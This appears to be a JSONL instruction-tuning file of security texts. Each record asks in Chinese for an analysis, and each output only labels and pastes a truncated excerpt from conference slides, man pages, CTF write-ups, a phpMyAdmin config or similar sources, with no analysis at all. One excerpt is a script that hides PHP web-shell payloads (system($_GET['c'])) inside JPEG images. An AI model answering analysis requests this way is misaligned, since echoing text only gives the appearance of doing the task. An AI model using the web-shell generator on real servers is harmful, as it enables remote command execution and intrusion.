{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSk3wlDbg: Emulating all (well many) of the things with Ida Chris Eagle Sk3wl 0f r00t Disclaimer  Everything I say today is my own opinion and not necessarily the opinion of my employer Who am I?  Senior lecturer of computer science  Computer security researcher  Reverse engineer  Inveterate Capture the Flag player  Performer of stupid IDA tricks Introduction  CPU emulators are useful in a variety of cases  System design before hardware is available  Running code from obsolete platforms  Studying code without need to stand up full hardware system  Some emulators go well beyond CPU to emulate full system including hardware Goals  Make lightweight CPU emulator available in a static reverse engineering context  Temporarily step away from reading a disassembly to confirm behavior  Incorporate results of a computation back into a static analysis End result - Sk3wlDbg  Lightweight emulator integrated into a disassembler  Disassembler  IDA Pro  Emulator  Unicorn Engine IDA Pro  Commercial disassembler  Supports many processor families  Integrated debugger supports x86 and ARM targets  Decompiler Unicorn Engine  Announced at BlackHat USA 2015  Same people that did Capstone  http://www.unicorn-engine.org/  Emulator framework based on QEMU  Supports x86, x86-64, ARM, ARM64, Sparc, MIPS, M68k  Related projects  http://www.unicorn-engine.org/showcase/ Some other emulators  Bochs  Bochs is a highly portable open source IA-32 (x86) PC emulator written in C++  http://bochs.sourceforge.net/  QEMU  QEMU is a generic and open source machine emulator and virtualizer.  http://www.qemu.org Emulators and IDA Pro  2003 ida-x86emu  For deobfuscating x86 binaries  2009 Hex-Rays adds Bochs debugger module  2014 msp430 for use with microcorruption  https://microcorruption.com  2016 Unicorn integration  Because why not Rationale  Looked at QEMU and Bochs briefly when writing ida-x86emu  Much too heavy weight for what I wanted  Too lazy to dig into the code to learn them and strip down  The Unic", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVisual Security Event Analysis DefCon 13 Las Vegas Raffael Marty, GCIA, CISSP Senior Security Engineer @ ArcSight July 29, 2005 * Raffael Marty 2 Defcon 2005 Las Vegas Raffael Marty Enterprise Security Management (ESM) specialist OVAL Advisory Board (Open Vulnerability and Assessment Language) ArcSight Research & Development IBM Research  Thor - http://thor.cryptojail.net  Log analysis and event correlation research  Tivoli Risk Manager Raffael Marty 3 Defcon 2005 Las Vegas Table Of Contents Introduction Related Work Basics Situational Awareness Forensic and Historical Analysis AfterGlow Raffael Marty 4 Defcon 2005 Las Vegas Introduction Raffael Marty 5 Defcon 2005 Las Vegas Disclaimer IP addresses and host names showing up in event graphs and descriptions were obfuscated/changed. The addresses are completely random and any resemblance with well-known addresses or host names are purely coincidental. Raffael Marty 6 Defcon 2005 Las Vegas Text or Visuals? What would you rather look at? Jun 17 09:42:30 rmarty ifup: Determining IP information for eth0... Jun 17 09:42:35 rmarty ifup: failed; no link present. Check cable? Jun 17 09:42:35 rmarty network: Bringing up interface eth0: failed Jun 17 09:42:38 rmarty sendmail: sendmail shutdown succeeded Jun 17 09:42:38 rmarty sendmail: sm-client shutdown succeeded Jun 17 09:42:39 rmarty sendmail: sendmail startup succeeded Jun 17 09:42:39 rmarty sendmail: sm-client startup succeeded Jun 17 09:43:39 rmarty vmnet-dhcpd: DHCPINFORM from 172.16.48.128 Jun 17 09:45:42 rmarty last message repeated 2 times Jun 17 09:45:47 rmarty vmnet-dhcpd: DHCPINFORM from 172.16.48.128 Jun 17 09:56:02 rmarty vmnet-dhcpd: DHCPDISCOVER from 00:0c:29:b7:b2:47 via vmnet8 Jun 17 09:56:03 rmarty vmnet-dhcpd: DHCPOFFER on 172.16.48.128 to 00:0c:29:b7:b2:47 via vmnet8 Jun 17 09:56:03 rmarty vmnet-dhcpd: DHCPREQUEST for 172.16.48.128 from 00:0c:29:b7:b2:47 via vmnet8 Jun 17 09:56:03 rmarty vmnet-dhcpd: DHCPACK on 172.16.48.128 to 00:0c:29:b7:b2:47 via vmnet8", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH LN 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 ln \\- 在文件间建立链接 .SH 概述 \\fBln\\fP [\\fI\\,选项\\/\\fP]... [\\fI\\,\\-T\\/\\fP] \\fI\\,目标 链接名\\/\\fP .br \\fBln\\fP [\\fI\\,选项\\/\\fP]... \\fI\\,目标\\/\\fP .br \\fBln\\fP [\\fI\\,选项\\/\\fP]... \\fI\\,目标\\/\\fP... \\fI\\,目录\\/\\fP .br \\fBln\\fP [\\fI\\,选项\\/\\fP]... \\fI\\,\\-t 目录 目标\\/\\fP... .SH 描述 .\\\" Add any additional description here .PP 在第一种格式中创建具有指定链接名且指向指定目标的链接在第二种格式中在当前目录创建指向目标位置的链接在第三四种格式中在指定目录中创建指向指定目标的链接默认创建硬链接当使用 \\fB\\-\\-symbolic\\fP 时创建符号链接默认情况下创建每个目标时不应存在与新链接的名称相同的文件创建硬链接时每个指定的目标都必须存在符号链接可以指向任意的位置当链接解析正常时将其解析为一个相对于其父目录的相对链接 .PP 必选参数对长短选项同时适用 .TP \\fB\\-\\-backup\\fP[=\\fI\\,控制参数\\/\\fP] 为每个已存在的目标文件创建一个备份 .TP \\fB\\-b\\fP 类似 \\fB\\-\\-backup\\fP但是不接受参数 .TP \\fB\\-d\\fP, \\fB\\-F\\fP, \\fB\\-\\-directory\\fP 允许超级用户尝试创建指向目录的硬链接注意此操作可能因系统限制而失败 .TP \\fB\\-f\\fP, \\fB\\-\\-force\\fP 强行删除任何已存在的目标文件 .TP \\fB\\-i\\fP, \\fB\\-\\-interactive\\fP 删除目标文件前进行确认 .TP \\fB\\-L\\fP, \\fB\\-\\-logical\\fP 如目标为符号链接本次创建链接时将其解引用 .TP \\fB\\-n\\fP, \\fB\\-\\-no\\-dereference\\fP 如果给定的链接名是一个链接至某目录的符号链接将其作为普通文件处理 .TP \\fB\\-P\\fP, \\fB\\-\\-physical\\fP 创建直接指向符号链接文件的硬链接 .TP \\fB\\-r\\fP, \\fB\\-\\-relative\\fP 和 \\fB\\-s\\fP 同时使用时创建相对于链接位置的链接 .TP \\fB\\-s\\fP, \\fB\\-\\-symbolic\\fP 创建符号链接而非硬链接 .TP \\fB\\-S\\fP, \\fB\\-\\-suffix\\fP=\\fI\\,后缀名\\/\\fP 覆盖通常的备份后缀配置 .TP \\fB\\-t\\fP, \\fB\\-\\-target\\-directory\\fP=\\fI\\,DIRECTORY\\/\\fP 在指定的目录中创建链接 .TP \\fB\\-T\\fP, \\fB\\-\\-no\\-target\\-directory\\fP 总是将给定的链接名当作普通文件 .TP \\fB\\-v\\fP, \\fB\\-\\-verbose\\fP 列出每个链接的文件名称 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .PP 备份文件的后缀为\"~\"除非以 \\fB\\-\\-suffix\\fP 选项或是SIMPLE_BACKUP_SUFFIX 环境变量指定版本控制的方式可通过\\fB\\-\\-backup\\fP 选项或 VERSION_CONTROL 环境变量来选择以下是可用的变量值 .TP none, off 从不创建备份即使给出了 \\fB\\-\\-backup\\fP .TP numbered, t 备份文件加上数字进行排序 .TP existing, nil 若有数字的备份文件已经存在则使用数字否则使用普通方式备份 .TP simple, never 总是创建简单的备份 .PP 使用 \\fB\\-s\\fP 选项会", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nldd === 打印程序或者库文件所依赖的共享库列表 ## 补充说明 **ldd命令** 用于打印程序或者库文件所依赖的共享库列表 ### 语法 ```shell ldd(选项)(参数) ``` ### 选项 ```shell --version打印指令版本号 -v详细信息模式打印所有相关信息 -u打印未使用的直接依赖 -d执行重定位和报告任何丢失的对象 -r执行数据对象和函数的重定位并且报告任何丢失的对象和函数 --help显示帮助信息 ``` ### 参数 文件指定可执行程序或者文库 ### 其他介绍 首先ldd不是一个可执行程序而只是一个shell脚本 ldd能够显示可执行模块的dependency其原理是通过设置一系列的环境变量如下`LD_TRACE_LOADED_OBJECTSLD_WARNLD_BIND_NOWLD_LIBRARY_VERSIONLD_VERBOSE`等当`LD_TRACE_LOADED_OBJECTS`环境变量不为空时任何可执行程序在运行时它都会只显示模块的dependency而程序并不真正执行要不你可以在shell终端测试一下如下 ```shell export LD_TRACE_LOADED_OBJECTS=1 ``` 再执行任何的程序如ls等看看程序的运行结果 ldd显示可执行模块的dependency的工作原理其实质是通过ld-linux.soelf动态库的装载器来实现的我们知道ld-linux.so模块会先于executable模块程序工作并获得控制权因此当上述的那些环境变量被设置时ld-linux.so选择了显示可执行模块的dependency 实际上可以直接执行ld-linux.so模块如`/lib/ld-linux.so.2 --list program`这相当于ldd program", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# What's My Name? Forensics, 250 points ## Description: > Say my name, say my name. A pcap file was attached (\"myname.pcap\"). ## Solution: We can use WireShark to inspect the network capture via a GUI, or `tshark` as a command line utility. First, we search for packets containing the word \"name\": ```console root@kali:/media/sf_CTFs/pico/Whats_My_Name# tshark -nr myname.pcap -Y 'frame contains \"name\"' 43 1418.341495 192.168.2.1  192.168.2.12 DNS 87 Standard query 0xaaa0 ANY thisismyname.com OPT 62905 53 55 1418.342859 192.168.2.12  192.168.2.1 DNS 316 Standard query response 0xaaa0 ANY thisismyname.com A 192.168.2.13 CNAME myname.com MX 5 myname.com MX 10 mx2.myname.com MX 20 mx3.myname.com NS ns1.myname.com NS ns2.myname.com TXT SOA ns1.thisismyname.com 53 62905 268 3.314481 192.168.86.16  255.255.255.255 DB-LSP-DISC 186 Dropbox LAN sync Discovery Protocol 17500 17500 269 3.314862 192.168.86.16  192.168.86.255 DB-LSP-DISC 186 Dropbox LAN sync Discovery Protocol 17500 17500 5419 33.420194 192.168.86.16  255.255.255.255 DB-LSP-DISC 186 Dropbox LAN sync Discovery Protocol 17500 17500 5420 33.420606 192.168.86.16  192.168.86.255 DB-LSP-DISC 186 Dropbox LAN sync Discovery Protocol 17500 17500 ``` We can inspect the contents of each packet. If we check packet #55, we will find the flag: ```console root@kali:/media/sf_CTFs/pico/Whats_My_Name# tshark -nr myname.pcap -Y 'frame.number==55' -T json [ { \"_index\": \"packets-2018-11-03\", \"_type\": \"pcap_file\", \"_score\": null, \"_source\": { \"layers\": { \"frame\": { \"frame.encap_type\": \"1\", \"frame.time\": \"Jul 8, 2018 04:55:29.288890000 IDT\", \"frame.offset_shift\": \"0.000000000\", \"frame.time_epoch\": \"1531014929.288890000\", \"frame.time_delta\": \"1417.308003000\", \"frame.time_delta_displayed\": \"0.000000000\", \"frame.time_relative\": \"1418.342859000\", \"frame.number\": \"55\", \"frame.len\": \"316\", \"frame.cap_len\": \"316\", \"frame.marked\": \"0\", \"frame.ignored\": \"0\", \"frame.protocols\": \"eth:ethertype:ip:udp:dns\" }, \"eth\": { \"eth.dst\": \"0a:00:27:00:00:16\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA recently released information about an old data beach of more than 500 million Yahoo users has put question mark on the multi-billion dollars sale of Yahoo to Verizon. After all, no-one wants to acquire a liability and not account for all future costs involved. Online dating app for spouse cheaters, Ashley Madison had to shutdown after a breach exposed its user information and billing related info leading to many real life divorces, resignations and [suicides including that of a pastor](http://money.cnn.com/2015/09/08/technology/ashley-madison-suicide/index.html). 600,000 Facebook accounts were hacked daily in 2011, maybe more today. The massive SONY pictures hack led to exposure of a lot of sensitive information regarding its projects, personal details of key executives and Hollywood bitching. It also exposed social security numbers and passwords of its employees and around 1 million users, allegedly all stored in a simple excel file clearly marked as 'Passwords.xls'. The famous fappening saga exposed nude pictures of a lot of Hollywood celebrities happened when a hacker wrote a [script to test celebrity Apple accounts for the top 500 most popular passwords that were approved by Apple's password policy](https://medium.com/@ryandemattia/what-we-should-learn-from-the-fappening-a-lesson-in-security-design-96e49f7eaee9#.nfm9z8637) (Caps, special chars and all). Much recently, an attack on a key DNS service provider Dyn brought down almost half of United State's internet and major websites like The New York Times, Twitter, etc. Where do things go wrong? Most of the exploits are human errors that lead to an opportunity and was attacked upon by a malicious hacker. Let us go back to the the typical flow of an App and interaction pattern of the App and its users. A user sitting in a cafe is browsing Product Hunt and comes across a new dating app, that promises to provide meaningful relationships. You install the app, signup using one of the two passwords you use everywher", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<?php /* * Generated configuration file * Generated by: phpMyAdmin 4.6.2 setup script * Date: Mon, 07 May 2018 10:48:03 +0000 */ /* Servers configuration */ $i = 0; /* Server: mysql [1] */ $i++; $cfg['Servers'][$i]['verbose'] = 'mysql'; $cfg['Servers'][$i]['host'] = 'mysql'; $cfg['Servers'][$i]['port'] = 3306; $cfg['Servers'][$i]['socket'] = ''; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'test'; $cfg['Servers'][$i]['password'] = 'test'; /* End of servers configuration */ $cfg['blowfish_secret'] = '5af02eda401ae8.69737537'; $cfg['DefaultLang'] = 'en'; $cfg['ServerDefault'] = 1; $cfg['UploadDir'] = ''; $cfg['SaveDir'] = '';", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## A numbers game II (PPC/Crypto, 70p) Description: Math is used in cryptography, but someone got this wrong. Can you still solve the equations? Hint: You need to encode your answers. ###ENG [PL](#pl-version) Server sends input as: Hi, I like math and cryptography. Can you talk to me?! Level 1.: 4.4.5.3.3.3.3.3.3.3.6.4.3.3.3.3.3.4.3.4.3.4.3.3.3.3.3.3.3.4.6.4.3.3.3.3.3.3.6.4.3.4.4.5 And we are also given the encryption code: ```python def encode(self, eq): out = [] for c in eq: q = bin(self._xor(ord(c),(2<<4))).lstrip(\"0b\") q = \"0\" * ((2<<2)-len(q)) + q out.append(q) b = ''.join(out) pr = [] for x in range(0,len(b),2): c = chr(int(b[x:x+2],2)+51) pr.append(c) s = '.'.join(pr) return s ``` The goal is to decrypt the task, solve it and then send encrypted answer. First we split the encryption into two functions (one loop in each) and then wrote decryption for each one of them. We replaced constants like (2<<4) for their numeric values for readibility. First part of the encryption function takes each character of the input, xors it with static key 32, converts this to binary and add 0 padding so that this binary representation has always 8 digits. Therefore for the decryption we can simply slice the input to get 8-digit long binary strings, then we treat each one of them as integers in base-2 (this gets rid of 0 padding) and xor with static key 32 (since `a xor b xor b = a`). ```python def encode1(eq): out = [] for c in eq: q = bin((ord(c)  32)).lstrip(\"0b\") q = \"0\" * (8 - len(q)) + q out.append(q) b = ''.join(out) return b def decode1(b): result = [] for i in range(0, len(b), 8): q = b[i:i + 8] q = chr(int(q, 2)  32) result.append(q) return \"\".join(result) ``` Second part of encryption takes the binary string we got from the first part, then slices it into 2-digit parts, treats each one as integer in baes-2, adds 51 and casts this to char. Then all chars are concatenated with dot as separator. Therefore the decryption of this part splits the input by dot to get charact", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/python \"\"\" Bulletproof Jpegs Generator Copyright (C) 2012 Damien \"virtualabs\" Cauquil This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. ------------- # How to use b.php?c=ls Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l \"\"\" from __future__ import print_function from future import standard_library standard_library.install_aliases() from builtins import range import struct,sys,os import gd from io import StringIO from random import randint,shuffle from time import time # image width/height (square) N = 32 def insertPayload(_in, _out, payload,off): \"\"\" Payload insertion (quick JPEG parsing and patching) \"\"\" img = _in # look for 'FF DA' (SOS) sos = img.index(\"\\xFF\\xDA\") sos_size = struct.unpack('>H',img[sos+2:sos+4])[0] sod = sos_size+2 # look for 'FF D9' (EOI) eoi = img[sod:].index(\"\\xFF\\xD9\") # enough size ? if (eoi - sod - off)>=len(payload): _out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:]) return True else: return False if __name__=='__main__': print(\"[+] Virtualabs' Nasty bulletproof Jpeg generator\") print(\" | website: http://virtualabs.fr\") print(\" | contact: virtualabs -at- gmail -dot- com\") print(\"\") payloads = [\"<?php system(/**/$_GET['c'/**/]); ?>\",\"<?php /**/system($_GET[chr(99)/**/]); ?>\",\"<?php system(/**/$_GET[chr(99)]); ?>\",\"<?php\\r\\nsystem($_GET[/**/'c']);\\r\\n ?>\"] # make sure the exploit-jpg dir", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJuly 19, 2005 C 1 Hacking from WEB 行政院 國家資通安全會報 技術服務中心 For HIT2005 Charmi Lin C 2 前言 網站伺服器(Web Server)幾乎是每一個 組織單位在網際網路上都必須要提供的網 路服務 WEB管理失當的危險 C 3 常見的WEB弱點  伺服器應用程式Buffer Overflow  MISConfiguration(配置失當)  使用者輸入驗證上的錯誤  網頁程式邏輯上的錯誤  程式輸出錯誤  密碼管制失當 C 4 Buffer Overflow 常被使用也最容易修補發現 修補方式僅需安裝廠商的修補程式即可 C 5 MISConfiguration 目錄權限失當 Windows 2000預設將inetpub\\wwwroot目錄給 於everyone完全的控制權限(可以執行讀取 寫入) User將Apache使用root權限執行 C 6 MISConfiguration 提供功能失當 WEBDAV的支援 湯姆貓的8005 port C 7 WebDAV WebDAV是什麼 \"Web-based Distributed Authoring and Versioning\". 它是一組由 HTTP/1.1 的功能延伸出來的 通訊協定讓用戶端發行(公佈資源讓他人 使用)鎖定並管理 Web 上的資源使得 使用者們得以經由網頁來共同編輯整 理管理檔案資料 C 8 WebDAV的好處 啟用WebDAV的好處??? 具有權限的使用者就可以在 WebDAV 目錄中自由複製尋找  刪除並移動檔案 修改與某些資源相關的內容 舉例來說使用者可以寫入並取回 檔案的內容資訊 將資源鎖定或解除鎖定如此多位使用者可同時讀取檔案但一 次只有一個人可以修改檔案 搜尋 WebDAV 目錄中的檔案的要旨與內容舉例來說您可以搜 尋所有含有 table 這個字的檔案或是搜尋所有由 Fred 建立的檔 案 誰是有權限的使用者? 誰可以決定要不要用webdav功能? 好處真的是好處嗎? C 9 WebDAV指令  OPTIONS ? 可以查詢網站提不提供WebDAV指令 OPTIONS * HTTP/1.1 Host: localhost HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 11 Aug 2000 14:09:10 GMT Content-Length: 0 Accept-Ranges: bytes DASL: <DAV:sql> DAV: 1, 2 Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIN D, PROPPATCH, LOCK, UNLOCK, SEARCH Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND , PROPPATCH, LOCK, UNLOCK, SEARCH Cache-Control: private C 10 WebDAV指令 HEAD ? 查詢檔案存不存在 HEAD /dir/ HTTP/1.1 Host: iis-server Content-Length: 0 C 11 WebDAV指令 PUT 直接上傳檔案 Delete 刪除檔案 Move 搬移檔案 C 12 MISConfiguration 元件配置失當 FrontPage Server Extension元件 C 13 FrontPage Server Extension漏洞 什麼是FrontPage Server Extension 一套功能強大的網站管理軟體支援 FrontPage 中的HTML 編輯製作並擴充 Web 伺服器功能之程式及 Script 的集合讓使用者 可以快速地進行搬移檔案檢查超連結等動 作管理整個網站 又是一樣的老問題 誰有權利可以透過FrontPage來管理網站? 誰可以決定要不要啟用FrontPage Server Extension功能? C 14 FrontPage Server Extension漏洞 誰有權利可以透過FrontPage來管理網站?Windows的 存取控制 !!!!!!Windows預設Everyone擁有檔案的完全控制權 任何人都可以透過 FrontPage來管理你 的網站 C 15 FrontPage Server Extension漏洞 誰可以決定要不要啟用FrontPage Server Extension功能? !!!!預設會安裝FrontPage Serv", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n(U) I hunt TR-069 admins Shahar Tal T O P S E C R E T / / S I / / R E L T O D C 2 2 no ISPs were harmed during the making of this presentation corporate legal wouldn't let us  Shahar Tal (@jifa)  Father, husband, geek  10 years with IDF obligatory whoami Agenda  Intro to TR-069  Why you should care  Landscape walkthrough  Top kek pwnage  Conclusion Residential Gateway Security  It sucks.  Pedro Joaquin (Routerpwn), Jacob Holcomb (SO HOpelessly broken), Zachary Cutlip (rooting SOHO), devtty0 (everything) TR-069 in 69 seconds CPE WAN Management Protocol (CWMP/TR-069)  2004: v1.0  2013: v1.4 (amendment 5) TR-069 Provisioning Session SOAP RPC (XML over HTTP) Always* initiates session Dual authentication mechanism ACS can issue Connection Request TR-069 Example RPC (ACSCPE) <soapenv:Envelope ...> ... <soapenv:Body> <cwmp:SetParameterValues> <ParameterList ...> <Name>InternetGatewayDevice.ManagementServer.URL</Name> <Value>http://acs.supersecureisp.com/cwmp/</Value> </ParameterList> ... </cwmp:SetParameterValues> </soapenv:Body> </soapenv:Envelope> TR-who?  Growing trend to adopt TR-069  Endorsed by Home Gateway Initiative, Digital Video Broadcasting, WiMax Forum  (2011) Estimated 147M TR-069 enabled devices online  70% Gateways  According to zmap, 7547 is open on 1.12% of IPv4 Good Guy ACS  Provision devices (zero-touch configuration)  Tech Support remote management  Monitor for faults, errors or malicious activity  Diagnostics and Performance  Replace/fix faulty configuration  Deploy upgraded firmware Trust Issues  Who do you trust to run code on your devices?  Silently?  Remotely?  With elevated permissions?  I *might* trust heavily protected updates from Apple / Microsoft / Google with this, but what about my ISP? TR-069 Architecture Photo credit: https://www.etsy.com/shop/sharpwriter APT APT APT APT APT APT APT APT CYBER APT CYBER Scumbag ACS  What would an attacker do if he was in control of an ACS?  Get private data  SSID, hostnames & MAC addresses, usernames, VoIP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAsura: A huge PCAP file analyzer for anomaly packets detection using massive multithreading Ruo Ando National Institute of Informatics DEF CON 26 AbstractRecently, the inspection of huge traffic log is im- posing a great burden on security analysts. Unfortunately, there have been few research efforts focusing on scalability in analyzing very large PCAP file with reasonable computing resources. Asura is a portable and scalable PCAP file analyzer for detecting anomaly packets using massive multithreading. Asuras parallel packet dump inspection is based on task-based decomposition and therefore can handle massive threads for large PCAP file without considering tidy parameter selection in adopting data decomposition. Asura is designed to scale out in processing large PCAP file by taking as many threads as possible. Asura takes two steps. First, Asura extracts feature vector represented by associative containers of < sourceIP, destIP > pair. By doing this, the feature vector can be drastically small compared with the size of original PCAP files. In other words, Asura can reduce packet dump data into the size of unique sourceIP, destIP pairs (for example, in experiment, Asuras output which is reduced in first step is about 2a parallel clustering algorithm is applied for the feature vector which is represented as < sourceIP, destIP >, V [i] where V [i] is aggregated flow vector. In second step, Asura adopts an enhanced Kmeans algorithm. Concretely, two functions of Kmeans which are (1)calculating distance and (2)relabeling points are improved for parallel processing. In experiment, in processing public PCAP datasets, Asura can detect 750 packets which are labeled as malicious from among 70 million (about 18GB) normal packets. In a nutshell, Asura successfully found 750 malicious packets in about 18GB packet dump. For Asura to inspect 70 million packets, it took reasonable computing time of around 350-450 minutes with 1000- 5000 multithreading by running commodity workstation. Asura", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnti-Forensics and Anti-Anti-Forensics by Michael Perklin (But not Anti-Anti-Anti-Forensics) (...or Uncle-Forensics...) Outline Techniques that can complicate digital-forensic examinations Methodologies to mitigate these techniques Other digital complications This talk will deal with a variety of complications that can arise in a digital investigation Michael Perklin Digital Forensic Examiner Corporate Investigator Computer Programmer eDiscovery Consultant Basically - A computer geek + legal support hybrid Techniques in this talk... Most of these techniques are NOT sophisticated Each one can easily be defeated by an investigator The goal of these techniques is to add man-hours/$$$ High costs increase chances of settlement Wiping a hard drive, or using steganography will not be discussed because theyve been around for decades Typical Methodologies: Copy First, Ask Questions Later Typically Law Enforcement Assess relevance first, copy relevant All types of investigators Remote analysis of live system, copy targeted evidence only. Enterprise, Private if they have help Methodology #1 is typically used by police Methodology #2 is used by all types of digital investigators Methodology #3 is typically used by Enterprise companies on their employees Assess Relevance method typically searches an HDD for one of a few specific keywords. If found, the HDD is imaged for further analysis. Typical Workflow Process Data For Analysis Separate Wheat from Chaff Analyze Data for Relevance Prepare Report on Findings Archive Data For Future Create Working Copy Create Working Copy - Image the HDD - Copy files remotely for analysis Process Data - Hash files - Analyze Signatures Separate Wheat - De-NIST or De-NSRL - Known File Filter (KFF) - Keyword Searches Analyze For Relevance - Good hits or false positives? - Look at photos, read documents, analyze spreadsheets - Export files for native analysis - Bookmark, Flag, or otherwise list useful things Prepare Report - Include thumbnails, snapshots, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2022 年中国网络安全行业 API 安全产品及服务购买指南 2022 年 9 月发布版 1 目录 前言 .................................................................................................................................................. 1 Akamai 阿卡迈 .............................................................................................................................. 8 北京安华金和科技有限公司 ......................................................................................................... 12 北京从云科技有限公司 ................................................................................................................. 25 北京长亭科技有限公司 ................................................................................................................. 30 深圳红途科技有限公司 ................................................................................................................. 35 北京九州云腾科技有限公司 ......................................................................................................... 39 上海派拉软件股份有限公司 ......................................................................................................... 43 全知科技杭州有限责任公司 ................................................................................................. 60 瑞数信息技术上海有限公司 ................................................................................................. 68 北京三江信达信息科技有限责任公司 ......................................................................................... 72 杭州世平信息科技有限公司 ......................................................................................................... 78 思睿嘉得信息技术有限公司 ......................................................................................................... 81 薮猫科技有限公司 ......................................................................................................................... 83 北京芯盾时代科技有限公司 ......................................................................................................... 86 北京星阑科技有限公司 .........................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUnderstanding the Web browser threat: Examination of vulnerable online Web browser populations and the \"insecurity iceberg\" Stefan Frei1, Thomas Duebendorfer2, Gunter Ollmann3, Martin May1 1 Communication Systems Group, ETH Zurich, Switzerland 2 Google Switzerland GmbH 3 IBM Internet Security Systems, USA Contact: insecurity-iceberg@ee.ethz.ch http://www.techzoom.net/insecurity-iceberg ETH Zurich Tech Report Nr. 288 1. INTRODUCTION In recent years the Web browser has increasingly become targeted as an infection vector for vulnerable hosts. Classic service-centric vulnerability exploitation required attackers to scan for and remotely connect to vulnerable hosts (typically servers) in order to exploit them. Unlike these, Web browser vulnerabilities are commonly exploited when the user of the vulnerable host visits a malicious Web site. Attacks against Web browsers depend upon malicious con- tent being rendered by the appropriate built-in interpreter (e.g., HTML, JavaScript, CSS, etc.) or vulnerable plug-in technol- ogy (e.g., Flash, QuickTime, Java, etc.) [1, 2]. Vulnerabilities lying within these rendering technologies are then exposed to any exploit techniques or malicious code developed by the at- tacker. Vulnerability trend reports have indicated that remotely exploitable vulnerabilities have been increasing since the year 2000 and reached 89.4% of vulnerabilities reported in 2007 [3]. A growing percentage of these remotely exploitable vul- nerabilities are associated with Web browsers. Profit motivated cyber-criminals have rapidly adopted Web browser exploitation as a key vector for malware installation. Due to the methodology of exploiting Web browser vulner- abilities and the unpredictable browsing patterns of typical users, for widespread infection of vulnerable hosts the crim- inals must seed a mix of popular and high-traffic websites, or incentivize users through email spam, with URLs directing po- tential victims to Web servers hosting their malicious content", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom tab import tab def doit(n, ops): for op, arg in ops: if op == 0: n += arg elif op == 1: n = (n << arg) | (n >> (8 - arg)) elif op == 2: n = arg else: assert False n &= 0xff return n def inv_one(op): o, a = op if o == 0: return (0, (256 - a) % 256) if o == 1: return (1, (8 - a) % 8) if o == 2: return op def inv(ops): return [inv_one(op) for op in ops[::-1]] SWAP = [(0, 254), (1, 7), (0, 1), (1, 1)] def get_swappy_sequence(a, b): if a == b: return [] if a > b: a, b = b, a return tab[(a, b)] + SWAP + inv(tab[(a, b)]) def get_perm_sequence(perm): seq = [] perm = perm[:] for i in range(256): j = perm.index(i) seq += get_swappy_sequence(i, j) perm[i], perm[j] = perm[j], perm[i] return seq pt = 'GoodCipher' from pwn import * import itertools charset = string.letters + string.digits def connect(h, p): r = remote(h, p) l = r.readline() suf = l.split(\"+\")[1].split(\")\")[0] exp = l.split(\"==\")[1].strip() for c in itertools.product(charset, repeat = 4): s = \"\".join(c) if s[1:] == 'aaa': print s if hashlib.sha256(s + suf).hexdigest() == exp: r.sendline(s) break return r r = connect(\"47.75.4.252\", 10001) for i in range(3): r.recvuntil(\"ciphertext is \") ct = r.recvline().strip().decode(\"hex\") print ct.encode(\"hex\") perm = range(256) for p, c in zip(pt, ct): p, c = ord(p), ord(c) j = perm.index(c) print p, c, j perm[p], perm[j] = c, perm[p] seq = get_perm_sequence(perm) for s in seq: r.send(str(s[0]) + \" \" + str(s[1])) print s, r.recvline().strip() r.send(\"\\n\") r.interactive()", "category": "text_analysis", "source": "security_papers"}
